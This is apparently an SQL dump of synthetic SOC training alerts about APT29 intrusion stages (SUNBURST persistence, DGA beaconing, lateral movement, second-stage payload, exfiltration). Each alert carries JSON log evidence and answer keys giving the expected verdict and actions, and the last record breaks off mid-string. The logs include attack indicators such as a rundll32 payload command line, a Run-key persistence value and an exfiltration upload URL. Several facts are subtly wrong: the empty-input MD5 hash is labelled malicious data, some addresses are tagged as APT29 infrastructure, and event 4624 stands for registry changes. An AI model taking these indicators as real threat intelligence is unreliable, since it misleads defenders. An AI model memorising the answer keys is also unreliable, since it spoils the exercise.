(558, 'Establishing Persistence with SUNBURST', 'high', 'System Registry Changes', 'APT29 is leveraging the SUNBURST backdoor to modify system registry settings, ensuring long-term access to the compromised networks.', 'Persistence', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"203.0.113.45\",\"username\":\"admin_user\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value_name\":\"SunburstPersistence\",\"registry_value_data\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\",\"hash\":\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\",\"external_ip\":\"203.0.113.45\",\"file_path\":\"C:\\\\Program Files\\\\SolarWinds\\\\Orion\\\\Sunburst.dll\"}', '2026-01-07 22:39:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with APT29 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the SUNBURST backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Sunburst.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"File associated with SUNBURST malware used by 
APT29.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.185Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"SunburstPersistence\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"hash\\\":\\\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\SolarWinds\\\\\\\\Orion\\\\\\\\Sunburst.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.185Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"SunburstPersistence\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k 
netsvcs\\\",\\\"hash\\\":\\\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\SolarWinds\\\\\\\\Orion\\\\\\\\Sunburst.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.185Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"SunburstPersistence\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"hash\\\":\\\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\SolarWinds\\\\\\\\Orion\\\\\\\\Sunburst.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.185Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"SunburstPersistence\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"hash\\\":\\\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program 
Files\\\\\\\\SolarWinds\\\\\\\\Orion\\\\\\\\Sunburst.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.185Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"SunburstPersistence\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"hash\\\":\\\"fd6f9e4e9d53ea8d2a5a3e4a1f92c8a5\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\SolarWinds\\\\\\\\Orion\\\\\\\\Sunburst.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(559, 'C2 Communication via Domain Generation Algorithm', 'high', 'DNS Traffic Analysis', 'The DNS logs indicate that a compromised host is communicating with multiple dynamically generated domains. This activity is indicative of command and control operations using a domain generation algorithm (DGA) typically employed by advanced persistent threats such as APT29.', 'Command and Control', 'T1568.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-06T14:23:45Z\",\"source_ip\":\"10.0.1.15\",\"destination_domain\":\"hgytqwoein.com\",\"queried_domains\":[\"hgytqwoein.com\",\"sjdhgqjwev.com\",\"aslkdjqwope.com\"],\"resolver_ip\":\"8.8.8.8\",\"detected_algorithm\":\"DGA\",\"associated_hash\":\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\",\"user\":\"jsmith\",\"process\":\"dns.exe\",\"internal_ip\":\"10.0.1.15\",\"external_ip\":\"198.51.100.14\",\"threat_actor\":\"APT29\",\"malware\":\"CustomDGA\"}', '2026-01-07 22:39:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"hgytqwoein.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Domain generated by a known DGA pattern used by APT29.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT29\'s DGA malware.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"198.51.100.14\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"suspicious\",\"details\":\"External IP associated with suspected command and control 
server.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.186Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-06T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_domain\\\":\\\"hgytqwoein.com\\\",\\\"queried_domains\\\":[\\\"hgytqwoein.com\\\",\\\"sjdhgqjwev.com\\\",\\\"aslkdjqwope.com\\\"],\\\"resolver_ip\\\":\\\"8.8.8.8\\\",\\\"detected_algorithm\\\":\\\"DGA\\\",\\\"associated_hash\\\":\\\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\\\",\\\"user\\\":\\\"jsmith\\\",\\\"process\\\":\\\"dns.exe\\\",\\\"internal_ip\\\":\\\"10.0.1.15\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\",\\\"threat_actor\\\":\\\"APT29\\\",\\\"malware\\\":\\\"CustomDGA\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.186Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-06T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_domain\\\":\\\"hgytqwoein.com\\\",\\\"queried_domains\\\":[\\\"hgytqwoein.com\\\",\\\"sjdhgqjwev.com\\\",\\\"aslkdjqwope.com\\\"],\\\"resolver_ip\\\":\\\"8.8.8.8\\\",\\\"detected_algorithm\\\":\\\"DGA\\\",\\\"associated_hash\\\":\\\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\\\",\\\"user\\\":\\\"jsmith\\\",\\\"process\\\":\\\"dns.exe\\\",\\\"internal_ip\\\":\\\"10.0.1.15\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\",\\\"threat_actor\\\":\\\"APT29\\\",\\\"malware\\\":\\\"CustomDGA\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.186Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-06T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_domain\\\":\\\"hgytqwoein.com\\\",\\\"queried_domains\\\":[\\\"hgytqwoein.com\\\",\\\"sjdhgqjwev.com\\\",\\\"aslkdjqwope.com\\\"],\\\"resolver_ip\\\":\\\"8.8.8.8\\\",\\\"detected_algorithm\\\":\\\"DGA\\\",\\\"associated_hash\\\":\\\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\\\",\\\"user\\\":\\\"jsmith\\\",\\\"process\\\":\\\"dns.exe\\\",\\\"internal_ip\\\":\\\"10.0.1.15\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\",\\\"threat_actor\\\":\\\"APT29\\\",\\\"malware\\\":\\\"CustomDGA\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.186Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-06T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_domain\\\":\\\"hgytqwoein.com\\\",\\\"queried_domains\\\":[\\\"hgytqwoein.com\\\",\\\"sjdhgqjwev.com\\\",\\\"aslkdjqwope.com\\\"],\\\"resolver_ip\\\":\\\"8.8.8.8\\\",\\\"detected_algorithm\\\":\\\"DGA\\\",\\\"associated_hash\\\":\\\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\\\",\\\"user\\\":\\\"jsmith\\\",\\\"process\\\":\\\"dns.exe\\\",\\\"internal_ip\\\":\\\"10.0.1.15\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\",\\\"threat_actor\\\":\\\"APT29\\\",\\\"malware\\\":\\\"CustomDGA\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.186Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-06T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_domain\\\":\\\"hgytqwoein.com\\\",\\\"queried_domains\\\":[\\\"hgytqwoein.com\\\",\\\"sjdhgqjwev.com\\\",\\\"aslkdjqwope.com\\\"],\\\"resolver_ip\\\":\\\"8.8.8.8\\\",\\\"detected_algorithm\\\":\\\"DGA\\\",\\\"associated_hash\\\":\\\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\\\",\\\"user\\\":\\\"jsmith\\\",\\\"process\\\":\\\"dns.exe\\\",\\\"internal_ip\\\":\\\"10.0.1.15\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\",\\\"threat_actor\\\":\\\"APT29\\\",\\\"malware\\\":\\\"CustomDGA\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(560, 'Credential Harvesting for Lateral Movement', 'high', 'Authentication Logs', 'APT29 utilizes harvested credentials to move laterally within the network, accessing sensitive systems and data.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T12:45:32Z\",\"event_id\":\"4624\",\"computer_name\":\"server-01.internal.local\",\"logon_type\":\"3\",\"subject\":{\"user_id\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"account_name\":\"admin_user\",\"account_domain\":\"INTERNAL\"},\"network_information\":{\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"10.0.0.15\"},\"additional_information\":{\"logon_process\":\"NtLmSsp\",\"authentication_package\":\"NTLM\",\"transmitted_services\":\"-\",\"lm_package_name\":\"-\"},\"threat_actor_ip\":\"185.199.108.153\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"APT29_tool.exe\"}', '2026-01-07 22:39:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT29.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with APT29 credential harvesting tool.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"APT29_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Threat Database\",\"verdict\":\"suspicious\",\"details\":\"Executable detected during lateral movement activities.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Internal admin account potentially 
compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(561, 'Deployment of Second-Stage Payloads', 'high', 'Malware Analysis Reports', 'The attackers deployed second-stage payloads to enhance their intelligence-gathering capabilities and maintain control over compromised systems. This activity is associated with APT29, known for sophisticated supply chain attacks and spearphishing campaigns.', 'Execution', 'T1059', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"malware_hash\":\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\",\"username\":\"j.doe\",\"filename\":\"payload_stage2.dll\",\"process_name\":\"svchost.exe\",\"command_line\":\"rundll32.exe payload_stage2.dll,EntryPoint\",\"event_description\":\"Second-stage payload executed on the host, enhancing attacker capabilities.\"}', '2026-01-07 22:39:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by second-stage payload.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of APT29 second-stage payloads.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"payload_stage2.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File used in second-stage malware deployment.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active 
Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.188Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\\\",\\\"username\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"payload_stage2.dll\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"command_line\\\":\\\"rundll32.exe payload_stage2.dll,EntryPoint\\\",\\\"event_description\\\":\\\"Second-stage payload executed on the host, enhancing attacker capabilities.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.188Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\\\",\\\"username\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"payload_stage2.dll\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"command_line\\\":\\\"rundll32.exe payload_stage2.dll,EntryPoint\\\",\\\"event_description\\\":\\\"Second-stage payload executed on the host, enhancing attacker 
capabilities.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.188Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\\\",\\\"username\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"payload_stage2.dll\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"command_line\\\":\\\"rundll32.exe payload_stage2.dll,EntryPoint\\\",\\\"event_description\\\":\\\"Second-stage payload executed on the host, enhancing attacker capabilities.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.188Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\\\",\\\"username\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"payload_stage2.dll\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"command_line\\\":\\\"rundll32.exe payload_stage2.dll,EntryPoint\\\",\\\"event_description\\\":\\\"Second-stage payload executed on the host, enhancing attacker capabilities.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.188Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\\\",\\\"username\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"payload_stage2.dll\\\",\\\"process_name\\\":\\\"svchost.exe\\\",\\\"command_line\\\":\\\"rundll32.exe payload_stage2.dll,EntryPoint\\\",\\\"event_description\\\":\\\"Second-stage payload executed on the host, enhancing attacker capabilities.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(562, 'Data Exfiltration via Stealth Channels', 'high', 'Outbound Traffic Monitoring', 'Detected data exfiltration attempt by APT29 using stealthy communication channels to transmit sensitive information from the internal network to an external server.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:25:43Z\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"185.199.110.153\",\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\",\"file_name\":\"confidential_report_2023.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_id\":\"jdoe\",\"action\":\"File Upload\",\"url\":\"https://maliciousdomain.com/upload\",\"description\":\"Large data transfer detected from internal IP 10.0.5.23 to external IP 185.199.110.153 over HTTPS. File hash and size match known signatures for exfiltrated data.\"}', '2026-01-07 22:39:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.199.110.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT29 operations\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with exfiltrated data by APT29\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://maliciousdomain.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL associated with data exfiltration 
activities\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"confidential_report_2023.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive data\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.189Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:25:43Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"185.199.110.153\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"file_name\\\":\\\"confidential_report_2023.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_id\\\":\\\"jdoe\\\",\\\"action\\\":\\\"File Upload\\\",\\\"url\\\":\\\"https://maliciousdomain.com/upload\\\",\\\"description\\\":\\\"Large data transfer detected from internal IP 10.0.5.23 to external IP 185.199.110.153 over HTTPS. 
